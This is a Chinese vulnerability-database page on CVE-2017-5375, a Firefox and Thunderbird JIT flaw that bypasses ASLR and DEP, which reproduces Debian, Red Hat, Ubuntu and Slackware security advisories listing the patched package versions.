CVE-2017-5375
CVSSN/A
发布时间 :2018-06-11 17:29:02
修订时间 :2018-06-12 21:29:03
NMPS    

[原文]JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5375
(官方数据源) NVD

- 其它链接及资源

http://rhn.redhat.com/errata/RHSA-2017-0190.html
(UNKNOWN)  REDHAT  RHSA-2017:0190
http://rhn.redhat.com/errata/RHSA-2017-0238.html
(UNKNOWN)  REDHAT  RHSA-2017:0238
http://www.securityfocus.com/bid/95757
(UNKNOWN)  BID  95757
http://www.securitytracker.com/id/1037693
(UNKNOWN)  SECTRACK  1037693
https://bugzilla.mozilla.org/show_bug.cgi?id=1325200
(UNKNOWN)  CONFIRM  https://bugzilla.mozilla.org/show_bug.cgi?id=1325200
https://security.gentoo.org/glsa/201702-13
(UNKNOWN)  GENTOO  GLSA-201702-13
https://security.gentoo.org/glsa/201702-22
(UNKNOWN)  GENTOO  GLSA-201702-22
https://www.debian.org/security/2017/dsa-3771
(UNKNOWN)  DEBIAN  DSA-3771
https://www.debian.org/security/2017/dsa-3832
(UNKNOWN)  DEBIAN  DSA-3832
https://www.exploit-db.com/exploits/42327/
(UNKNOWN)  EXPLOIT-DB  42327
https://www.exploit-db.com/exploits/44293/
(UNKNOWN)  EXPLOIT-DB  44293
https://www.exploit-db.com/exploits/44294/
(UNKNOWN)  EXPLOIT-DB  44294
https://www.mozilla.org/security/advisories/mfsa2017-01/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-01/
https://www.mozilla.org/security/advisories/mfsa2017-02/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-02/
https://www.mozilla.org/security/advisories/mfsa2017-03/
(UNKNOWN)  CONFIRM  https://www.mozilla.org/security/advisories/mfsa2017-03/

- 漏洞信息 (F140736)

Debian Security Advisory 3771-1 (PacketStormID:F140736)
2017-01-26 00:00:00
Debian  debian.org
advisory,web,arbitrary,info disclosure
linux,debian
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396
[点击下载]

Debian Linux Security Advisory 3771-1 - Multiple security issues have been found in the Mozilla Firefox web errors may lead to the execution of arbitrary code, information disclosure or privilege escalation.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3771-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
January 25, 2017                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 CVE-2017-5378 
                 CVE-2017-5380 CVE-2017-5383 CVE-2017-5386 CVE-2017-5390 
                 CVE-2017-5396

Multiple security issues have been found in the Mozilla Firefox web
browser: Memory safety errors, use-after-frees and other implementation
errors may lead to the execution of arbitrary code, information
disclosure or privilege escalation.

For the stable distribution (jessie), these problems have been fixed in
version 45.7.0esr-1~deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 45.7.0esr-1 of firefox-esr and version 51.0-1 of firefox.

We recommend that you upgrade your firefox-esr packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAliJHIUACgkQEMKTtsN8
TjYexQ/+O/+MLKzBc4csbrwlf4BLIWDi8uNAihn/S/pV+u9VkbaBohpod/iOSaYg
ZVSn0MAchI6zXZN2YokVKJQZGxKR66MbXFZH2rtLlmuvCkW2nus1/A5728PiAsLA
9Pi54mQdYGJkElfed0QId0zvtykRBrQP9QL9Y6KRs2Cn1UzNkmE+ypZmdgHbcK0H
oNhS3FLVgJH7DuEB7JDo+QfiCgqYAKiQ4JG+Dr0Ft1qdeFD8c7JvVA6zxW15nH1R
eCwenS4BL48YgfCHgCGqJqGC2Iz27t8be1laQxpJLPIZm/3y54aPQb6SJT+71FkV
qZT/dG5EaNh+INxYEY/zKmu636grjKXd/jIVCSaMKlev+wqDgleEM0cVz4agywY3
CJqfx3EhyK0qiwdc9fi0rAqtIYNaCsXZ6VolVnd9Ea0aqWn+w1pRzy1ZGj0gWlyU
H6LHGgfBmtPsqxkb2o0+2IDTzeNxC+7EgCoM012axIwwimZKFXJJeRknmyqPD55g
+r4KAv+UFZF7EsT132avWS+Wg0f/9bP6NkDoEpEFz/+Wp5sHG+u6e/ACD6EfQVJs
GigFm+9dwglfzCBhioL25E/73SgL1pNh8V3Js/0A3RnMq6OAV626N2VL7+QeW5D+
5MdhPxJxEr9pjEtSG1/g5fp1gD71mioRaJihywLBt2uqCK+ZBS0=
=e/Q3
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F140721)

Red Hat Security Advisory 2017-0190-01 (PacketStormID:F140721)
2017-01-25 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396
[点击下载]

Red Hat Security Advisory 2017-0190-01 - Mozilla Firefox is an open source web browser. This update upgrades Firefox to version 45.7.0 ESR. Security Fix: Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Critical: firefox security update
Advisory ID:       RHSA-2017:0190-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2017-0190.html
Issue date:        2017-01-25
CVE Names:         CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 
                   CVE-2017-5378 CVE-2017-5380 CVE-2017-5383 
                   CVE-2017-5386 CVE-2017-5390 CVE-2017-5396 
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 5, Red
Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open source web browser.

This update upgrades Firefox to version 45.7.0 ESR.

Security Fix(es):

* Multiple flaws were found in the processing of malformed web content. A
web page containing malicious content could cause Firefox to crash or,
potentially, execute arbitrary code with the privileges of the user running
Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,
Christian Holler, Gary Kwong, AndrA(c) Bargull, Jan de Mooij, Tom Schuster,
and Oriol, Rh0, Nicolas GrA(c)goire, and Jerri Rice as the original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1415924 - CVE-2017-5373 Mozilla: Memory safety bugs fixed in Firefox 51 and Firefox ESR 45.7 (MFSA 2017-01)
1416271 - CVE-2017-5375 Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
1416272 - CVE-2017-5376 Mozilla: Use-after-free in XSL (MFSA 2017-02)
1416273 - CVE-2017-5378 Mozilla: Pointer and frame data leakage of Javascript objects (MFSA 2017-02)
1416274 - CVE-2017-5380 Mozilla: Potential use-after-free during DOM manipulations (MFSA 2017-02)
1416279 - CVE-2017-5390 Mozilla: Insecure communication methods in Developer Tools JSON viewer (MFSA 2017-02)
1416280 - CVE-2017-5396 Mozilla: Use-after-free with Media Decoder (MFSA 2017-02)
1416281 - CVE-2017-5383 Mozilla:Location bar spoofing with unicode characters (MFSA 2017-02)
1416282 - CVE-2017-5386 Mozilla: WebExtensions can use data: protocol to affect other extensions (MFSA 2017-02)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
firefox-45.7.0-1.el5_11.src.rpm

i386:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-45.7.0-1.el5_11.x86_64.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
firefox-45.7.0-1.el5_11.src.rpm

i386:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm

ppc:
firefox-45.7.0-1.el5_11.ppc64.rpm
firefox-debuginfo-45.7.0-1.el5_11.ppc64.rpm

s390x:
firefox-45.7.0-1.el5_11.s390x.rpm
firefox-debuginfo-45.7.0-1.el5_11.s390x.rpm

x86_64:
firefox-45.7.0-1.el5_11.i386.rpm
firefox-45.7.0-1.el5_11.x86_64.rpm
firefox-debuginfo-45.7.0-1.el5_11.i386.rpm
firefox-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

ppc64:
firefox-45.7.0-1.el6_8.ppc64.rpm
firefox-debuginfo-45.7.0-1.el6_8.ppc64.rpm

s390x:
firefox-45.7.0-1.el6_8.s390x.rpm
firefox-debuginfo-45.7.0-1.el6_8.s390x.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
firefox-45.7.0-1.el6_8.src.rpm

i386:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
firefox-45.7.0-1.el6_8.x86_64.rpm
firefox-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

x86_64:
firefox-45.7.0-1.el6_8.i686.rpm
firefox-debuginfo-45.7.0-1.el6_8.i686.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

aarch64:
firefox-45.7.0-1.el7_3.aarch64.rpm
firefox-debuginfo-45.7.0-1.el7_3.aarch64.rpm

ppc64:
firefox-45.7.0-1.el7_3.ppc64.rpm
firefox-debuginfo-45.7.0-1.el7_3.ppc64.rpm

ppc64le:
firefox-45.7.0-1.el7_3.ppc64le.rpm
firefox-debuginfo-45.7.0-1.el7_3.ppc64le.rpm

s390x:
firefox-45.7.0-1.el7_3.s390x.rpm
firefox-debuginfo-45.7.0-1.el7_3.s390x.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
firefox-45.7.0-1.el7_3.src.rpm

x86_64:
firefox-45.7.0-1.el7_3.x86_64.rpm
firefox-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
firefox-45.7.0-1.el7_3.i686.rpm
firefox-debuginfo-45.7.0-1.el7_3.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-5373
https://access.redhat.com/security/cve/CVE-2017-5375
https://access.redhat.com/security/cve/CVE-2017-5376
https://access.redhat.com/security/cve/CVE-2017-5378
https://access.redhat.com/security/cve/CVE-2017-5380
https://access.redhat.com/security/cve/CVE-2017-5383
https://access.redhat.com/security/cve/CVE-2017-5386
https://access.redhat.com/security/cve/CVE-2017-5390
https://access.redhat.com/security/cve/CVE-2017-5396
https://access.redhat.com/security/updates/classification/#critical
https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox-esr/#firefoxesr45.7

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFYiHYyXlSAg2UNWIIRAtAAAKCwDibjavMUgpo76nzm+Lratno50gCfS2wP
SyArDDAAwG3bghzp2Y9zEsk=
=L0Rr
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F140770)

Ubuntu Security Notice USN-3165-1 (PacketStormID:F140770)
2017-01-30 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary,javascript,xss
linux,ubuntu
CVE-2016-9893,CVE-2016-9895,CVE-2016-9897,CVE-2016-9898,CVE-2016-9899,CVE-2016-9900,CVE-2016-9904,CVE-2016-9905,CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396
[点击下载]

Ubuntu Security Notice 3165-1 - Multiple memory safety issues were discovered in Thunderbird. If a user were tricked in to opening a specially crafted message, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. Andrew Krasichkov discovered that event handlers on <marquee> elements were executed despite a Content Security Policy that disallowed inline JavaScript. If a user were tricked in to opening a specially crafted website in a browsing context, an attacker could potentially exploit this to conduct cross-site scripting attacks. Various other issues were also addressed.

===========================================================================
Ubuntu Security Notice USN-3165-1
January 28, 2017

thunderbird vulnerabilities
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple memory safety issues were discovered in Thunderbird. If a user were
tricked in to opening a specially crafted message, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2016-9893, CVE-2017-5373)

Andrew Krasichkov discovered that event handlers on <marquee> elements
were executed despite a Content Security Policy (CSP) that disallowed
inline JavaScript. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to conduct cross-site scripting (XSS) attacks.
(CVE-2016-9895)

A memory corruption issue was discovered in WebGL in some circumstances.
If a user were tricked in to opening a specially crafted website in a
browsing context, an attacker could potentially exploit this to cause a
denial of service via application crash, or execute arbitrary code.
(CVE-2016-9897)

A use-after-free was discovered when manipulating DOM subtrees in the
Editor. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2016-9898)

A use-after-free was discovered when manipulating DOM events and audio
elements. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2016-9899)

It was discovered that external resources that should be blocked when
loading SVG images can bypass security restrictions using data: URLs. An
attacker could potentially exploit this to obtain sensitive information.
(CVE-2016-9900)

Jann Horn discovered that JavaScript Map/Set were vulnerable to timing
attacks. If a user were tricked in to opening a specially crafted website
in a browsing context, an attacker could potentially exploit this to
obtain sensitive information across domains. (CVE-2016-9904)

A crash was discovered in EnumerateSubDocuments while adding or removing
sub-documents. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to execute arbitrary code. (CVE-2016-9905)

JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5375)

Nicolas Gr=C3=A9goire discovered a use-after-free when manipulating XSL in
XSLT documents in some circumstances. If a user were tricked in to opening
a specially crafted website in a browsing context, an attacker could
potentially exploit this to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5376)

Jann Horn discovered that an object's address could be discovered through
hashed codes of JavaScript objects shared between pages. If a user were
tricked in to opening a specially crafted website in a browsing context,
an attacker could potentially exploit this to obtain sensitive
information. (CVE-2017-5378)

A use-after-free was discovered during DOM manipulation of SVG content in
some circumstances. If a user were tricked in to opening a specially
crafted website in a browsing context, an attacker could potentially
exploit this to cause a denial of service via application crash, or
execute arbitrary code. (CVE-2017-5380)

Armin Razmjou discovered that certain unicode glyphs do not trigger
punycode display. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to spoof the URL bar contents. (CVE-2017-5383)

Jerri Rice discovered insecure communication methods in the Dev Tools JSON
Viewer. An attacker could potentially exploit this to gain additional
privileges. (CVE-2017-5390)

Filipe Gomes discovered a use-after-free in the media decoder in some
circumstances. If a user were tricked in to opening a specially crafted
website in a browsing context, an attacker could potentially exploit this
to cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  thunderbird                     1:45.7.0+build1-0ubuntu0.16.10.1

Ubuntu 16.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.14.04.1

Ubuntu 12.04 LTS:
  thunderbird                     1:45.7.0+build1-0ubuntu0.12.04.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3165-1
  CVE-2016-9893, CVE-2016-9895, CVE-2016-9897, CVE-2016-9898,
  CVE-2016-9899, CVE-2016-9900, CVE-2016-9904, CVE-2016-9905,
  CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
  CVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396

Package Information:
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.16.10.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.14.04.1
  https://launchpad.net/ubuntu/+source/thunderbird/1:45.7.0+build1-0ubuntu0.12.04.1



    

- 漏洞信息 (F140769)

Ubuntu Security Notice USN-3175-1 (PacketStormID:F140769)
2017-01-30 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary
linux,ubuntu
CVE-2017-5373,CVE-2017-5374,CVE-2017-5375,CVE-2017-5376,CVE-2017-5377,CVE-2017-5378,CVE-2017-5379,CVE-2017-5380,CVE-2017-5381,CVE-2017-5382,CVE-2017-5383,CVE-2017-5384,CVE-2017-5385,CVE-2017-5386,CVE-2017-5387,CVE-2017-5388,CVE-2017-5389,CVE-2017-5390,CVE-2017-5391,CVE-2017-5393,CVE-2017-5396
[点击下载]

Ubuntu Security Notice 3175-1 - Multiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. JIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Various other issues were also addressed.

===========================================================================
Ubuntu Security Notice USN-3175-1
January 27, 2017

firefox vulnerabilities
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

Firefox could be made to crash or run programs as your login if it
opened a malicious website.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

Multiple memory safety issues were discovered in Firefox. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit these to cause a denial of service via application
crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)

JIT code allocation can allow a bypass of ASLR protections in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5375)

Nicolas Gr=C3=A9goire discovered a use-after-free when manipulating XSL in
XSLT documents in some circumstances. If a user were tricked in to opening
a specially crafted website, an attacker could potentially exploit this to
cause a denial of service via application crash, or execute arbitrary
code. (CVE-2017-5376)

Atte Kettunen discovered a memory corruption issue in Skia in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5377)

Jann Horn discovered that an object's address could be discovered through
hashed codes of JavaScript objects shared between pages. If a user were
tricked in to opening a specially crafted website, an attacker could
potentially exploit this to obtain sensitive information. (CVE-2017-5378)

A use-after-free was discovered in Web Animations in some circumstances.
If a user were tricked in to opening a specially crafted website, an
attacker could potentially exploit this to cause a denial of service via
application crash, or execute arbitrary code. (CVE-2017-5379)

A use-after-free was discovered during DOM manipulation of SVG content in
some circumstances. If a user were tricked in to opening a specially
crafted website, an attacker could potentially exploit this to cause a
denial of service via application crash, or execute arbitrary code.
(CVE-2017-5380)

Jann Horn discovered that the "export" function in the Certificate Viewer
can force local filesystem navigation when the Common Name contains
slashes. If a user were tricked in to exporting a specially crafted
certificate, an attacker could potentially exploit this to save content
with arbitrary filenames in unsafe locations. (CVE-2017-5381)

Jerri Rice discovered that the Feed preview for RSS feeds can be used to
capture errors and exceptions generated by privileged content. An attacker
could potentially exploit this to obtain sensitive information.
(CVE-2017-5382)

Armin Razmjou discovered that certain unicode glyphs do not trigger
punycode display. An attacker could potentially exploit this to spoof the
URL bar contents. (CVE-2017-5383)

Paul Stone and Alex Chapman discovered that the full URL path is exposed
to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a
user has enabled Web Proxy Auto Detect (WPAD), an attacker could
potentially exploit this to obtain sensitive information. (CVE-2017-5384)

Muneaki Nishimura discovered that data sent in multipart channels will
ignore the Referrer-Policy response headers. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2017-5385)

Muneaki Nishimura discovered that WebExtensions can affect other
extensions using the data: protocol. If a user were tricked in to
installing a specially crafted addon, an attacker could potentially
exploit this to obtain sensitive information or gain additional
privileges. (CVE-2017-5386)

Mustafa Hasan discovered that the existence of local files can be
determined using the <track> element. An attacker could potentially
exploit this to obtain sensitive information. (CVE-2017-5387)

Cullen Jennings discovered that WebRTC can be used to generate large
amounts of UDP traffic. An attacker could potentially exploit this to
conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)

Kris Maglione discovered that WebExtensions can use the mozAddonManager
API by modifying the CSP headers on sites with the appropriate permissions
and then using host requests to redirect script loads to a malicious site.
If a user were tricked in to installing a specially crafted addon, an
attacker could potentially exploit this to install additional addons
without user permission. (CVE-2017-5389)

Jerri Rice discovered insecure communication methods in the Dev Tools JSON
Viewer. An attacker could potentially exploit this to gain additional
privileges. (CVE-2017-5390)

Jerri Rice discovered that about: pages used by content can load
privileged about: pages in iframes. An attacker could potentially exploit
this to gain additional privileges, in combination with a
content-injection bug in one of those about: pages. (CVE-2017-5391)

Stuart Colville discovered that mozAddonManager allows for the
installation of extensions from the CDN for addons.mozilla.org, a publicly
accessible site. If a user were tricked in to installing a specially
crafted addon, an attacker could potentially exploit this, in combination
with a cross-site scripting (XSS) attack on Mozilla's AMO sites, to
install additional addons. (CVE-2017-5393)

Filipe Gomes discovered a use-after-free in the media decoder in some
circumstances. If a user were tricked in to opening a specially crafted
website, an attacker could potentially exploit this to cause a denial of
service via application crash, or execute arbitrary code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  firefox                         51.0.1+build2-0ubuntu0.16.10.1

Ubuntu 16.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.16.04.1

Ubuntu 14.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.14.04.1

Ubuntu 12.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.12.04.1

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3175-1
  CVE-2017-5373, CVE-2017-5374, CVE-2017-5375, CVE-2017-5376,
  CVE-2017-5377, CVE-2017-5378, CVE-2017-5379, CVE-2017-5380,
  CVE-2017-5381, CVE-2017-5382, CVE-2017-5383, CVE-2017-5384,
  CVE-2017-5385, CVE-2017-5386, CVE-2017-5387, CVE-2017-5388,
  CVE-2017-5389, CVE-2017-5390, CVE-2017-5391, CVE-2017-5393,
  CVE-2017-5396

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.10.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.04.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.14.04.1
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.12.04.1



    

- 漏洞信息 (F140768)

Slackware Security Advisory - mozilla-thunderbird Updates (PacketStormID:F140768)
2017-01-30 00:00:00
Slackware Security Team  slackware.com
advisory
linux,slackware
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396
[点击下载]

Slackware Security Advisory - New mozilla-thunderbird packages are available for Slackware 14.1, 14.2, and -current to fix security issues.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  mozilla-thunderbird (SSA:2017-026-01)

New mozilla-thunderbird packages are available for Slackware 14.1, 14.2,
and -current to fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5376
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5378
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5380
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5390
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5396
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5383
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5386
